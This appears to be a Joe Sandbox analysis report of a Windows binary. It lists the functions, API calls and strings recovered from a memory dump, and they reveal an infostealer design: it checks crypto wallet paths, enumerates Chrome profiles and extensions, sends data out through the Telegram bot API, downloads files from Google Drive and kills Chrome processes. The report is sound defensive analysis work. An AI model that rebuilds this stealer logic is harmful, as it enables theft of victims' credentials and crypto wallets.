Failed to initialize ZIP archive: , xrefs: 00007FF643F26B2D
Failed to create output file: , xrefs: 00007FF643F27155
Extracted: , xrefs: 00007FF643F2765F
", xrefs: 00007FF643F26B24
Failed to extract entry: , xrefs: 00007FF643F273A2
Failed to get entry info for index: , xrefs: 00007FF643F26C98

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: __std_fs_code_page
String ID: "$Extracted: $Failed to create output file: $Failed to extract entry: $Failed to get entry info for index: $Failed to initialize ZIP archive: $Failed to open ZIP file: $create_directories$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1686256323-3304824404
Opcode ID: ca601215968a881bfc8d844b289b2e5e2cea346b4ae4ab5881baf2d2748eeb92
Instruction ID: 262e3c0aa39bbba204c777d7510d745987af219b60a15f1e7c7dde0c7b7bb661
Opcode Fuzzy Hash: ca601215968a881bfc8d844b289b2e5e2cea346b4ae4ab5881baf2d2748eeb92
Instruction Fuzzy Hash: 3BA2E372A0CB86C5EB50BF25C5423EC2361FB457A8F504631DA6CA7ADAEF79E185D300

Function 00007FF643F310F0 Relevance: 60.5, APIs: 25, Strings: 9, Instructions: 1005COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF643F311B4

Part of subcall function 00007FF643F5E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF643F23F96), ref: 00007FF643F5E0C6

Part of subcall function 00007FF643F23AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF643F23B25
Part of subcall function 00007FF643F23AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF643F23BCA

__std_fs_code_page.LIBCPMT ref: 00007FF643F3128E
__std_fs_code_page.LIBCPMT ref: 00007FF643F3191B
__std_fs_code_page.LIBCPMT ref: 00007FF643F31E27
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F320BA

Part of subcall function 00007FF643F62A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F62A68
Part of subcall function 00007FF643F62A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F62A6E

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F320D8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F320F3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F320F9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F320FF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F32105
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3210B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F32111
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F32117
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3211D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F32123
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F32129
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F3212F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F32135
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3213B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F32141
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F32147
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3216B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F32177
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3217D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F32183

Strings

.lck, xrefs: 00007FF643F3181F
exists, xrefs: 00007FF643F320CB, 00007FF643F3219B
remove, xrefs: 00007FF643F32158
create_directories, xrefs: 00007FF643F320E6
Extensions count: , xrefs: 00007FF643F314EF
C:\Program Files\Google\Chrome\Extensions, xrefs: 00007FF643F31189
Profiles count: , xrefs: 00007FF643F313AF
.zip, xrefs: 00007FF643F31680
Download failed, xrefs: 00007FF643F31F25

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_fs_code_page$__std_fs_convert_narrow_to_wide$ApisFile
String ID: .lck$.zip$C:\Program Files\Google\Chrome\Extensions$Download failed$Extensions count: $Profiles count: $create_directories$exists$remove
API String ID: 3708190391-83527870
Opcode ID: 395d995e25c899ef3dd9c793b388adef5e14986ec9ff63cdf41a4b5fc1a7c61e
Instruction ID: 408b4a08b569ad015739debee43255fe77d97c2b8db01131d73142ec7795b2fb
Opcode Fuzzy Hash: 395d995e25c899ef3dd9c793b388adef5e14986ec9ff63cdf41a4b5fc1a7c61e
Instruction Fuzzy Hash: A2A2D462A1CB8285EB50BF64D5423ED2761FB55798F105331EA6D67BDADF78E080E300

Function 00007FF643F33CE0 Relevance: 53.4, APIs: 19, Strings: 11, Instructions: 876
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET ref: 00007FF643F33DAB
InternetOpenUrlA.WININET ref: 00007FF643F33ECC
InternetCloseHandle.WININET ref: 00007FF643F33EF8
InternetReadFile.WININET ref: 00007FF643F33F5E
InternetReadFile.WININET ref: 00007FF643F33FD4
InternetCloseHandle.WININET ref: 00007FF643F33FE1
InternetCloseHandle.WININET ref: 00007FF643F33FEA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F34C3F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F34C45
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F34C4B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F34C57
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F34C5D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F34C63
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F34C69
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F34C6F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F34C75
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F34C7B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F34C81
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F34C87

Strings

Could not fetch IP, xrefs: 00007FF643F33D4E
N/A, xrefs: 00007FF643F34204, 00007FF643F343C1, 00007FF643F34455, 00007FF643F344DA
Location not available, xrefs: 00007FF643F33D80
Error parsing JSON response: , xrefs: 00007FF643F34A52
IPInfoFetcher, xrefs: 00007FF643F33DA4
InternetOpenUrl failed., xrefs: 00007FF643F33EDA
https://ipinfo.io/json, xrefs: 00007FF643F33EC2
region, xrefs: 00007FF643F3446F
InternetOpen failed., xrefs: 00007FF643F33DBD
country, xrefs: 00007FF643F343DB
city, xrefs: 00007FF643F344F1

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Internet$CloseHandle$FileOpenRead
String ID: Could not fetch IP$Error parsing JSON response: $IPInfoFetcher$InternetOpen failed.$InternetOpenUrl failed.$Location not available$N/A$city$country$https://ipinfo.io/json$region
API String ID: 427349759-3899726476
Opcode ID: 1f02335d04f10409e37e00b66a2d6d8842639688e42a5788f78dd1e5a12e55ce
Instruction ID: 547495b46da262665c10a3b68e75d83ab87a4a830ffe322c959ef618ce1fa214
Opcode Fuzzy Hash: 1f02335d04f10409e37e00b66a2d6d8842639688e42a5788f78dd1e5a12e55ce
Instruction Fuzzy Hash: 4592B322A1C7C295EB60FF64D8523ED2361EB45798F505631DA1DABADADF3CD281E300

Function 00007FF643F27C50 Relevance: 53.3, APIs: 19, Strings: 11, Instructions: 827comCOMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF643F27CEE

Part of subcall function 00007FF643F5E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF643F23F96), ref: 00007FF643F5E0C6

Part of subcall function 00007FF643F23AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF643F23B25
Part of subcall function 00007FF643F23AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF643F23BCA

__std_fs_code_page.LIBCPMT ref: 00007FF643F27D7A
__std_fs_code_page.LIBCPMT ref: 00007FF643F27EBB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F28486
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2848C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F284A6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F284BD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F284C3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F284C9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F284CF
CoInitialize.OLE32 ref: 00007FF643F2850E
CoCreateInstance.OLE32 ref: 00007FF643F2853A

Strings

C:\Users, xrefs: 00007FF643F27CAA
The directory , xrefs: 00007FF643F283A5
Failed to save shortcut file., xrefs: 00007FF643F2874F
exists, xrefs: 00007FF643F28479
Failed to create ShellLink COM object., xrefs: 00007FF643F2855D
does not exist or is not accessible., xrefs: 00007FF643F283D2
directory_iterator::directory_iterator, xrefs: 00007FF643F28499
status, xrefs: 00007FF643F28463
Failed to get IPersistFile interface., xrefs: 00007FF643F286BE
directory_entry::status, xrefs: 00007FF643F284B0
User: , xrefs: 00007FF643F28015

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$__std_fs_convert_narrow_to_wide$ApisCreateFileInitializeInstance
String ID: does not exist or is not accessible.$C:\Users$Failed to create ShellLink COM object.$Failed to get IPersistFile interface.$Failed to save shortcut file.$The directory $User: $directory_entry::status$directory_iterator::directory_iterator$exists$status
API String ID: 2171753736-278810226
Opcode ID: 08b54cf656a112a2754771785b4b71a2edcbde101545a1cba5b01f5e624e08e0
Instruction ID: 4b4f025659fe7477e860ceb9bbd5e0bb1fc2617f0d035aa311c6cc4e0f5ed54f
Opcode Fuzzy Hash: 08b54cf656a112a2754771785b4b71a2edcbde101545a1cba5b01f5e624e08e0
Instruction Fuzzy Hash: 7272C062F1CB82C5EB50BB65D5422ED2361EB85BA8F504631DE5CA3BE9DF39E481D300

Function 00007FF643F29B00 Relevance: 48.0, APIs: 17, Strings: 10, Instructions: 741fileCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF643F29B53
FindFirstFileW.KERNEL32 ref: 00007FF643F29BC8
DeleteFileW.KERNEL32 ref: 00007FF643F2A537
FindNextFileW.KERNELBASE ref: 00007FF643F2A6EE
FindClose.KERNEL32 ref: 00007FF643F2A71B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A76D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A773
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A77F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A785
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F2A78B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A791
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A7C5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A7DC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A7E2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A7E8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A7EE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A7FC

Strings

Deleted: , xrefs: 00007FF643F2A541
exists, xrefs: 00007FF643F2A7A4
C:\Users\, xrefs: 00007FF643F29B82
.lnk, xrefs: 00007FF643F2A1F3
Error finding user directories, xrefs: 00007FF643F29C41
directory_iterator::directory_iterator, xrefs: 00007FF643F2A7B8
Failed to delete: , xrefs: 00007FF643F2A569
USERPROFILE, xrefs: 00007FF643F29B4C
\Desktop, xrefs: 00007FF643F29E67
directory_entry::status, xrefs: 00007FF643F2A7CF

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$FileFind$CloseConcurrency::cancel_current_taskDeleteEnvironmentFirstNextVariable
String ID: .lnk$C:\Users\$Deleted: $Error finding user directories$Failed to delete: $USERPROFILE$\Desktop$directory_entry::status$directory_iterator::directory_iterator$exists
API String ID: 1014275803-3111992417
Opcode ID: 065c89a1d72a24bc2d3c70620168c6c6ecb5cc03ceeb2eba9924551621a46ecd
Instruction ID: 2391cdd757d315ec44147e90630489c2c3ee3036825bd6a360666c445d507f6e
Opcode Fuzzy Hash: 065c89a1d72a24bc2d3c70620168c6c6ecb5cc03ceeb2eba9924551621a46ecd
Instruction Fuzzy Hash: 9C72B372A1CBC2C1EEA0BB15E5423EE6361EB857A4F404231DAADA3AD5DF7DD484D700

Function 00007FF643F34D20 Relevance: 40.7, APIs: 15, Strings: 8, Instructions: 446
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET ref: 00007FF643F34D81
InternetOpenUrlA.WININET ref: 00007FF643F35232
InternetReadFile.WININET ref: 00007FF643F35255
InternetReadFile.WININET ref: 00007FF643F35306
InternetCloseHandle.WININET ref: 00007FF643F35317
InternetCloseHandle.WININET ref: 00007FF643F35388
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3540E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F35414
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F35420
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F35426
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3542C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F35432
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F35438
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3543E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3544A

Strings

&text=, xrefs: 00007FF643F34FE6
%%%02X, xrefs: 00007FF643F34EC5
TelegramBot, xrefs: 00007FF643F34D7A
InternetOpenUrl failed., xrefs: 00007FF643F35337
&parse_mode=HTML, xrefs: 00007FF643F35071
/sendMessage?chat_id=, xrefs: 00007FF643F34F57
InternetOpen failed., xrefs: 00007FF643F34DAB
https://api.telegram.org/bot, xrefs: 00007FF643F34F40

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Internet$CloseFileHandleOpenRead
String ID: %%%02X$&parse_mode=HTML$&text=$/sendMessage?chat_id=$InternetOpen failed.$InternetOpenUrl failed.$TelegramBot$https://api.telegram.org/bot
API String ID: 490362910-2071712312
Opcode ID: 0112b3fe0ccf7d40b14a75b7af19f0e01c5f05e3558ed60759056e54dfdfff20
Instruction ID: 20e7cd0e76f538f8e7b5eaa91ba82d0079600e8a8c4d60d0b453b0f0ff820cd6
Opcode Fuzzy Hash: 0112b3fe0ccf7d40b14a75b7af19f0e01c5f05e3558ed60759056e54dfdfff20
Instruction Fuzzy Hash: FB12A362E1CB8285EB40FB75D5423BD6761FB957A8F105331EA6C67AD6DF78E080A300

Function 00007FF643F26190 Relevance: 38.9, APIs: 12, Strings: 10, Instructions: 360
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET ref: 00007FF643F26434
InternetOpenUrlA.WININET ref: 00007FF643F264D5
InternetReadFile.WININET ref: 00007FF643F26593
InternetReadFile.WININET ref: 00007FF643F265CD
InternetCloseHandle.WININET ref: 00007FF643F265E3
InternetCloseHandle.WININET ref: 00007FF643F265EC
InternetCloseHandle.WININET ref: 00007FF643F266DA
InternetCloseHandle.WININET ref: 00007FF643F266E3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2674B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2675D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F26763
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F26769

Strings

File downloaded successfully and saved as , xrefs: 00007FF643F26620
DST: , xrefs: 00007FF643F263D0
&export=download, xrefs: 00007FF643F2623B
*, xrefs: 00007FF643F26617
InternetOpenUrl failed., xrefs: 00007FF643F264FB
Failed to open file for writing., xrefs: 00007FF643F26689
FileDownloader, xrefs: 00007FF643F2642D
https://drive.google.com/uc?id=, xrefs: 00007FF643F26223
URL: , xrefs: 00007FF643F2634F
InternetOpen failed., xrefs: 00007FF643F2645A

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Internet$CloseHandle_invalid_parameter_noinfo_noreturn$FileOpenRead
String ID: &export=download$*$DST: $Failed to open file for writing.$File downloaded successfully and saved as $FileDownloader$InternetOpen failed.$InternetOpenUrl failed.$URL: $https://drive.google.com/uc?id=
API String ID: 1313048855-3858291459
Opcode ID: 294f5fc85c2f0487906edd9b6b1f9d274cb8d59ae5dbbc5e0e372d52cfeca7c9
Instruction ID: ff7a1283f45662d36e3f76f9a9c1b793b12e29940024b79acc9d843fe9fa6b4b
Opcode Fuzzy Hash: 294f5fc85c2f0487906edd9b6b1f9d274cb8d59ae5dbbc5e0e372d52cfeca7c9
Instruction Fuzzy Hash: 7DF1F362F1CB86C1FA40BB64E5467AD2361FB857A4F104231EA5CA7AD9DF7DE481A300

Function 00007FF643F28A90 Relevance: 33.4, APIs: 5, Strings: 14, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NetUserEnum.NETAPI32(?,?,?,?,?,00000000,?,00007FF643F293EA), ref: 00007FF643F28B31
WideCharToMultiByte.KERNEL32(?,?,?,?,?,00000000,?,00007FF643F293EA), ref: 00007FF643F28B92
WideCharToMultiByte.KERNEL32(?,?,?,?,?,00000000,?,00007FF643F293EA), ref: 00007FF643F28BE6
NetApiBufferFree.NETAPI32(?,?,?,?,?,00000000,?,00007FF643F293EA), ref: 00007FF643F28C72
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F28CB9

Strings

Exodus, xrefs: 00007FF643F29136, 00007FF643F29186
Atomic, xrefs: 00007FF643F291D6
exists, xrefs: 00007FF643F28F47
C:\Users\%s\AppData\Local\Programs\Trezor Suite, xrefs: 00007FF643F29203
C:\ProgramData\%s\exodus, xrefs: 00007FF643F29110
Trezor, xrefs: 00007FF643F2922F, 00007FF643F2929A
C:\Users\%s\AppData\Local\Programs\atomic, xrefs: 00007FF643F291B0
Electrum, xrefs: 00007FF643F2936A
C:\Program Files\Ledger Live, xrefs: 00007FF643F292D0
C:\Program Files\Trezor Suite, xrefs: 00007FF643F29268
C:\Users\%s\AppData\Local\exodus, xrefs: 00007FF643F29160
status, xrefs: 00007FF643F28F58
Ledger Live, xrefs: 00007FF643F292FF
C:\Program Files (x86)\Electrum, xrefs: 00007FF643F29338

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ByteCharMultiWide$BufferEnumFreeUser_invalid_parameter_noinfo_noreturn
String ID: Atomic$C:\Program Files (x86)\Electrum$C:\Program Files\Ledger Live$C:\Program Files\Trezor Suite$C:\ProgramData\%s\exodus$C:\Users\%s\AppData\Local\Programs\Trezor Suite$C:\Users\%s\AppData\Local\Programs\atomic$C:\Users\%s\AppData\Local\exodus$Electrum$Exodus$Ledger Live$Trezor$exists$status
API String ID: 3930398341-644159398
Opcode ID: 7eb9e71283cd00da8b237cdaf3f54b70826188251e06d88bdb529acb721159e9
Instruction ID: 037cfb2fc7d691744fa0e7e35538553a3fa2063aa3246ad9a4f7622bf17fd97e
Opcode Fuzzy Hash: 7eb9e71283cd00da8b237cdaf3f54b70826188251e06d88bdb529acb721159e9
Instruction Fuzzy Hash: F6519F32B09B81DAE750EF65E4812AD73A5FB48798F404235EE5DA7B98DF39D141D300

Function 00007FF643F5E440 Relevance: 27.2, APIs: 18, Instructions: 229
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesExW.KERNEL32 ref: 00007FF643F5E4ED
GetLastError.KERNEL32 ref: 00007FF643F5E4F7
FindFirstFileW.KERNEL32 ref: 00007FF643F5E50E
GetLastError.KERNEL32 ref: 00007FF643F5E51A
FindClose.KERNEL32 ref: 00007FF643F5E528
__std_fs_open_handle.LIBCPMT ref: 00007FF643F5E5BB
CloseHandle.KERNEL32 ref: 00007FF643F5E5D1
CloseHandle.KERNEL32 ref: 00007FF643F5E744

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handle
String ID:
API String ID: 2398595512-0
Opcode ID: 084919010e652b5f85a0bab5836ad3d9afdd541a1c584fafeb2c470db68b38aa
Instruction ID: e46b6bcbbf9c679e00df6d81cad024810fa00665a67fe4a102513ae9ee4e1b14
Opcode Fuzzy Hash: 084919010e652b5f85a0bab5836ad3d9afdd541a1c584fafeb2c470db68b38aa
Instruction Fuzzy Hash: A1919535B0DA0386E6E47F25B8066B92290AF657B0F148730D9BDE76E5DF3CE405A700

Function 00007FF643F25D60 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 265
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF643F25DA2
Process32FirstW.KERNEL32 ref: 00007FF643F25E30
OpenProcess.KERNEL32 ref: 00007FF643F25F2A
TerminateProcess.KERNEL32 ref: 00007FF643F25FB5
CloseHandle.KERNEL32 ref: 00007FF643F25FC8
Process32NextW.KERNEL32 ref: 00007FF643F25FD6
CloseHandle.KERNEL32 ref: 00007FF643F25FE7
Sleep.KERNEL32 ref: 00007FF643F26086
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F26180

Strings

Terminating Chrome process with PID , xrefs: 00007FF643F25E4D
Failed to create process snapshot., xrefs: 00007FF643F25DB4
All Chrome instances closed., xrefs: 00007FF643F260C1
No Chrome instances found or failed to close., xrefs: 00007FF643F26140
chrome.exe, xrefs: 00007FF643F25E40

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotTerminateToolhelp32_invalid_parameter_noinfo_noreturn
String ID: All Chrome instances closed.$Failed to create process snapshot.$No Chrome instances found or failed to close.$Terminating Chrome process with PID $chrome.exe
API String ID: 2017165370-1079413332
Opcode ID: c63639f6410e3f4b994faab32d566cb5ea5f152ba874f59cca8d5faf868ec6cc
Instruction ID: e567ab08cc5e40bf4d3c7d807972a42efc77ded90566a56de3fe9d8ebd3c2f42
Opcode Fuzzy Hash: c63639f6410e3f4b994faab32d566cb5ea5f152ba874f59cca8d5faf868ec6cc
Instruction Fuzzy Hash: 7CB14862B1C681C1EE50FB25E5022BA6361EF857B4F504331EAAD976E9DE7DE081A700

Function 00007FF643F7D2C8 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 335
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF643F7D30D

